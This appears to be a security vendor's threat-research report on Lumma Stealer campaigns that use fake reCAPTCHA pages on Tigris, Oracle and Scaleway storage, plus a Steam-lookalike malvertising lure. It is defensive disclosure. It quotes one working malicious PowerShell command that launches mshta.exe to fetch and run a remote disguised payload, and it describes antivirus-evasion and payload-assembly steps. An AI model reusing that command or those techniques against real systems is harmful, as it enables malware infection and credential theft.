Cato CTRL™ Threat Research: Suspected Russian Threat Actors Leverage Tigris, Oracle Cloud Infrastructure, and Scaleway to Target Privileged Users with Lumma Stealer
|
Listen to post:
Getting your Trinity Audio player ready...
|
Executive Summary
Imagine walking into a trusted bank, only to be handed counterfeit money by employees who don’t realize it’s fake. This is similar to a growing trend that’s emerging in the threat landscape. Threat actors are leveraging trusted cloud infrastructure platforms to host fake reCAPTCHA pages designed to deceive unsuspecting victims into executing malicious commands through the Windows Run dialog—specifically targeting high-access users within organizations to escalate privileges.
Our investigation has revealed a shift in the delivery methods of Lumma Stealer (also known as LummaC2 Stealer), a malware-as-a-service (MaaS) infostealer that targets Windows systems to exfiltrate credentials, system data, and crypto wallets. In February 2025, we observed threat actors leveraging Tigris Object Storage to host malicious content through fake reCAPTCHA pages, suggesting a focus on technically proficient users within organizations. The use of a developer-friendly and trusted platform like Tigris may have contributed to the activity initially evading detection. By March 2025, we observed similar tactics involving Oracle Cloud Infrastructure (OCI) Object Storage. By May 2025, these tactics have extended to Scaleway Object Storage. In all three cases, we found code-level evidence linking the activity to suspected Russian threat actors.
Below is a breakdown of the evolving techniques of two Lumma Stealer campaigns targeting organizations, starting with the recent activity this year of Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage against privileged users and tracing back to earlier efforts last year against gamers through fake software downloads imitating the Steam platform.
The choice to target privileged users at organizations is particularly concerning, as it may enable lateral movement within enterprise environments, increasing the risk of deeper compromise beyond the initial infection.
As part of our investigation into Lumma Stealer through the Cato MDR service, we proactively block fake reCAPTCHA redirection attempts using a high-confidence Cato IPS rule, mitigating the threat before user interaction. All Cato Networks customers are protected from Lumma Stealer.
We reached out to Tigris, Oracle, and Scaleway with our findings:
- Tigris acknowledged receipt, confirming that the sample we reported is no longer accessible on their platform. Additionally, Tigris has published a summary of how it combats platform abuse.
- Oracle has not responded as of the time of publication.
- Scaleway acknowledged receipt, confirming that they have taken the necessary steps to remove the fake reCAPTCHA pages on their platform.
We remain committed to working with cloud service providers to reduce the likelihood of their platforms being leveraged for malicious purposes.
Technical Summary
Lumma Stealer Campaign #1: Targeting Privileged Users via Tigris, OCI, and Scaleway Using LoLBins Techniques
Summary of Key Findings
Attack Vector: Fake reCAPTCHA pages on Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage
Method: Users tricked into running clipboard-injected PowerShell via Windows + R
Execution: PowerShell launches mshta.exe to fetch disguised trojan (sports[.]mp4)
Techniques Used (MITRE ATT&CK):
- T1583.006: Acquire Infrastructure – Web Services
- T1204.004: User Execution – Malicious Copy and Paste
- T1059.001: Command and Scripting Interpreter: PowerShell
- T1218.005: Signed Binary Proxy Execution (mshta.exe)
- T1036.008: Masquerading: Masquerade File Type
Payload: Lumma Stealer
Evidence: VirusTotal and URLScan detections (Figures 2–12)
In-Depth Analysis and Insights
In February 2025, we observed attacks targeting organizations, where victims were redirected to Tigris Object Storage (a globally caching, S3-compatible object storage service) hosting fake human verification pages. These pages instructed users to press Windows + R to open the Run dialog and unknowingly execute a malicious PowerShell command copied to their clipboard, as shown in Figure 1.
Figure 1. Fake reCAPTCHA page hosted on Tigris Object Storage
We identified a slightly obfuscated PowerShell command (example below) that silently invokes mshta.exe, a legitimate Windows binary commonly leveraged by threat actors. In this case, the script attempts to execute content from a remote URL, amacys[.]shop/sports1[.]mp4, which is disguised as a benign video file.
Example: Malicious PowerShell Command Delivered via Clipboard
"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -w 1 -C "$l='hxxps[://]amacys[.]shop/sports[.]mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ ''I am not a robot: CAPTCHA Verification UID: 7811'” We analyzed this file and found it is detected as a trojan on VirusTotal. Figure 2 shows the corresponding VirusTotal scan results for sports[.]mp4; a similar sample video file deflowev1.mp4 (Figure 3) was found to be associated with malware as well. Notably, these campaigns were mostly observed using suspicious top-level domains (TLDs) such as .shop, .site, and others, along with deceptive file extensions to disguise malicious payloads as harmless media files.
Figure 2. VirusTotal detection of sports.mp4 hosted on amacys[.]shop, identified as a trojan masquerading as a video file
Figure 3. VirusTotal detection of deflowev1.mp4 hosted on domains with [.]shop TLD, detected as Lumma Stealer
Tigris Object Storage Leveraged for Hosting Fake reCAPTCHA Pages
In February 2025, we found that Tigris Object Storage has been leveraged by threat actors to host fake reCAPTCHA pages. Figure 4 presents multiple VirusTotal detections confirming this malicious activity, while Figure 5 shows URLScan hits for fake reCAPTCHA content hosted on Tigris Object Storage.
Figure 4. VirusTotal detections of fake reCAPTCHA pages hosted on Tigris Object Storage
Figure 5. URLScan hits for fake reCAPTCHA hosted on Tigris Object Storage
Silent Execution of mshta.exe: A Common LOLBins Tactic with Russian-Language Comments Identified
We analyzed multiple Document Object Model (DOM) samples, which represent the structure and content of loaded web pages, and identified embedded PowerShell commands invoking mshta.exe, a legitimate Windows utility often exploited by threat actors to execute remote or embedded malicious scripts. This technique is commonly used in Living Off the Land Binaries (LOLBins) attacks to evade detection. Figures 6, 7, and 8 illustrate this behavior across various samples.
We also found comments written in Russian within several of the samples, as shown in Figure 7. When translating these comments, we see phrases like “Garbage HTML code,” “Main container,” “Additional garbage block,” “Additional garbage content to distract from the main code,” “Obfuscated code with garbage decoy functions,” “Decoy function (never called),” “Main click handler,” and “Additional garbage: random variables and unused functions.” These annotations appear consistently in Russian across the sample code and may suggest a possible connection to Russian threat actors. While this is not definitive evidence of attribution, it could indicate that the code was developed or maintained by Russian-speaking individuals. The use of such labels also points to a deliberate attempt to mislead security analysts and slow down manual investigation, while helping the attackers maintain a more structured workflow that makes the code easier to debug, update, and collaborate on.
Figure 6. DOM sample associated with domain: fly[.]storage[.]tigris[.]dev
Figure 7. DOM sample associated with domain: zuroxflweb[.]fly[.]storage[.]tigris[.]dev
Figure 8. DOM sample associated with domain: fly[.]storage[.]tigris[.]dev
OCI Object Storage Leveraged for Hosting Fake reCAPTCHA Pages
In March 2025, we found that OCI Object Storage (a storage platform), accessed via objectstorage.<region>.oraclecloud.com, has been leveraged by threat actors to host fake reCAPTCHA pages. Threat actors are bypassing security controls by embedding malicious content within legitimate cloud infrastructure.
Figure 9 shows URLScan detections of these fake reCAPTCHA pages, with additional hits highlighted in Figure 10. We include an example of code written in Russian in Figure 11.
Figure 9. URLScan detections of fake reCAPTCHA pages hosted on OCI Object Storage
Figure 10. Additional URLScan hits showing malicious reCAPTCHA pages on OCI Object Storage
Figure 11. DOM sample associated with URL: objectstorage[.]ap-seoul-1[.]oraclecloud.com/n/id0cu93izlqm/b/need-to-complete-this/o/dest.html
Scaleway Object Storage Leveraged for Hosting Fake reCAPTCHA pages
In May 2025, we found that Scaleway Object Storage (an S3-compatible storage service), accessed via scw.cloud, has been leveraged by threat actors to host fake reCAPTCHA pages.
We have several observed samples containing recurring Russian-language comments (Figure 13).
Figure 12. Additional URLScan hits showing malicious reCAPTCHA pages on Scaleway Object Storage
Figure 13. DOM sample associated with URL: datastream-dist[.]s3[.]pl-waw[.]scw[.]cloud/pass-this-for-access-prism[.]HTML
Lumma Stealer Campaign #2: Targeting Gaming Enthusiasts with Steam-Like Domain Using LoLBins Techniques
Summary of Key Findings
Attack Vector: Malvertising and brand impersonation
Techniques Used (MITRE ATT&CK):
- T1204.004: User Execution – Malicious Copy and Paste
- T1059.003: Command and Scripting Interpreter – Windows Command Shell
- T1059.010: Command and Scripting Interpreter – AutoHotKey & AutoIT
- T1574.001: Hijack Execution Flow – DLL Search Order Hijacking
- T1036: Masquerading (use of a Steam-like domain)
- T1036.001: Masquerading – Invalid Code Signature
- T1027.013: Obfuscated Files or Information – Encrypted/Encoded File
- T1518.001: Software Discovery – Security Software Discovery
Target Audience: Gaming enthusiasts
Malicious Domain: my-steamunlocked[.]online (mimicking Steam)
Payload Delivered: Lumma Stealer
Initial Access Method: Fake game downloads delivered through deceptive ads
2025 Cato CTRL™ Threat Report | Download the reportIn-Depth Analysis and Insights
In October 2024, we detected a Lumma Stealer distribution campaign that leveraged malvertising to compromise victims. Threat actors used malicious ads posing as legitimate software promotions, specifically targeting gaming enthusiasts. We observed that the attack chain redirected users from wq24-1[.]g-site[.]store to my-steamunlocked[.]online, a domain crafted to mimic the Steam platform. Unsuspecting users, believing they were downloading a free game, instead initiated the download of a Lumma Stealer payload, as shown in Figure 14.
Figure 14. Malware delivery disguised as a free game download
Upon clicking the link, the victim is instructed to copy a URL pointing to Mega, a legitimate cloud storage provider, in order to download a password-protected compressed file with an unusually long filename, as shown in Figure 15.
Figure 15. Redirection to my-steamunlocked[.]online imitating the Steam platform
We found that once extracted, the archive contains legitimate files, including Setup.exe (renamed from SenseCE.exe), alongside a modified DLL (MpGear.dll) crafted for DLL hijacking, as shown in Figure 16.
Figure 16. DLL hijacking via Microsoft-signed setup.exe using LOLBins
This technique was previously observed in a Lumma Stealer distribution campaign, as reported by ASEC.
Lumma Stealer’s Latest Variant Targets Gamers with Evolving Techniques
In March 2025, we found that the malicious domain (wq24-1[.]g-site[.]store) was still active redirecting the traffic on different domains and continued to use the same method: instructing users to copy and paste a new Mega cloud storage link to download what appears to be cracked software. However, we recently discovered that the ZIP file now contains a different version of Lumma Stealer, employing a new technique. Figure 17 shows the contents of the password-protected compressed file.
Figure 17. Files inside the password-protected compressed file
When we executed SETUP.exe (as shown in Figure 18), it immediately spawned a command line process that ran an obfuscated batch script located in the %temp% folder (Figure 19). We then analyzed and deobfuscated the script, as shown in Figure 20.
Figure 18. SETUP.exe execution
Figure 19. Obfuscated batch script
Figure 20. Deobfuscated batch script
Breakdown:
- SophosHealth = Sophos
- bdservicehost = Bitdefender
- AvastUI = Avast
- AVGUI = AVG
- nsWscSvc = Norton Security
- ekrn = ESET
Batch Script Analysis
Security Check & Execution Delay
We observed that the script performs a security scan using tasklist.exe and findstr.exe (Figure 21) to detect known antivirus tools such as Sophos, Bitdefender, Avast, AVG, Norton Security, and ESET. When one of these is found, the script delays execution using the command ping -n 189 127.0.0.1 or choice /d y /t 300, likely in an attempt to evade or outlast the AV tools.
Figure 21. Processes cmd tasklist.exe, findstr.exe, and conhot.exe triggered by the script
Payload Assembly
We found that the script constructs a .com file by echoing the standard “MZ” header and combining multiple components (e.g., Readings, Legends) into Properly.com using binary mode (/b). This results in an AutoIt3-based executable. While AutoIt3.exe is legitimate, we’ve observed it being leveraged to obfuscate malware, act as a loader, and blend in with trusted system processes—consistent with living off the land (LOTL) techniques.
Script Construction via Embedded WAV Files
We observed the script combining multiple .wav files using copy /b to create a new file, n.a3x. These .wav files contain embedded binary data which, when merged, form a compiled AutoIt script. This technique is shown in Figure 22.
Figure 22. Dropped files in %TEMP% folder
Execution
Finally, the newly assembled .com file (AutoIT3.exe) is executed along with the n.a3x payload, followed by the choice /d y /t 300 command to introduce a 300-second delay.
We found that the script’s ultimate goal is to infect the device by executing a heavily obfuscated n.a3x AutoIT script containing the Lumma Stealer payload (Figure 23). We analyzed the script and observed that it spans thousands of lines, designed to obstruct analysis and hide its true intent. It decodes the embedded Lumma Stealer binary in memory and executes it. Once the system is infected, the malware reaches out to its command-and-control (C2) server to begin data exfiltration as configured.
Figure 23. Encoded Lumma Stealer binary data
Conclusion
We have analyzed two Lumma Stealer campaigns targeting organizations: one delivered through malvertising and cracked software in 2024 mimicking Steam, and the other using fake reCAPTCHA pages hosted on Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage in 2025. Through our analysis, we have observed a clear evolution in attacker techniques.
The recent campaign leveraging Tigris Object Storage, OCI Object Storage, and Scaleway Object Storage builds upon earlier methods, introducing new delivery mechanisms aimed at evading detection and targeting technically proficient users. Using Cato XDR and our story-based detection framework, we identified and blocked these threats early in the attack flow. As part of our investigation, we analyzed DOM samples from the fake reCAPTCHA pages and found threat actor comments written in Russian, including specific annotations embedded in the code. These findings highlight the technical depth and preparation behind the campaign.
We reached out to Tigris, Oracle, and Scaleway with our findings:
- Tigris acknowledged receipt, confirming that the sample we reported is no longer accessible on their platform. Additionally, Tigris has published a summary of how it combats platform abuse.
- Oracle has not responded as of the time of publication.
- Scaleway acknowledged receipt, confirming that they have taken the necessary steps to remove the fake reCAPTCHA pages on their platform.
We remain committed to working with cloud service providers to reduce the likelihood of their platforms being leveraged for malicious purposes.
As threat actors continue to evolve and leverage trusted infrastructure, continuous behavioral analysis and contextual detection remain critical to effective threat prevention.
Security Risks Introduced by the Evolved Delivery Tactics
- Targeting Privileged Users through Trusted Cloud Platforms: Threat actors host fake reCAPTCHA pages on platforms such as Tigris, OCI, and Scaleway. These attacks often count on technically proficient or privileged users being more likely to follow manual instructions, such as copying and executing system commands, especially when prompted by what appears to be a legitimate verification process.
- Leveraging Scaleway’s Low Visibility: Threat actors have also hosted fake reCAPTCHA content on Scaleway Object Storage, taking advantage of its lower security visibility and detection coverage compared to more widely monitored cloud infrastructure platforms. This allows malicious content to persist longer and evade traditional filtering mechanisms.
- Fake reCAPTCHA for Evasion: Manual user interaction bypasses automated detection, enabling stealthy malware execution.
Protections
As part of our investigation into Lumma Stealer through the Cato MDR service, we identified and blocked attempted redirections to fake reCAPTCHA pages. Using a high-confidence Cato IPS rule tailored to this technique, we proactively intercepted the threat before user interaction could occur, effectively mitigating it.
As Lumma Stealer delivery methods continue to evolve, alongside similar tactics used by other threat actors, we remain focused on adapting our detection capabilities. We actively track emerging threats, enhance prevention mechanisms, and automatically update our threat intelligence to block known malicious indicators.
Figure 24 shows an example of our detection of a disguised free game download, while Figure 25 highlights the detection of a fake reCAPTCHA page hosted in Tigris Object Storage.
Figure 24. Detection timeline of a disguised free game download
Figure 25. Detection timeline of a fake reCAPTCHA hosted in Tigris Object Storage
Indicators of Compromise (IoCs)
Malicious Domains & URLs
Malicious Files
Related Articles
Cato CTRL Threat Research: Stuck in the Past - How Hackers Exploit Years-Old CVEs for Cryptojacking
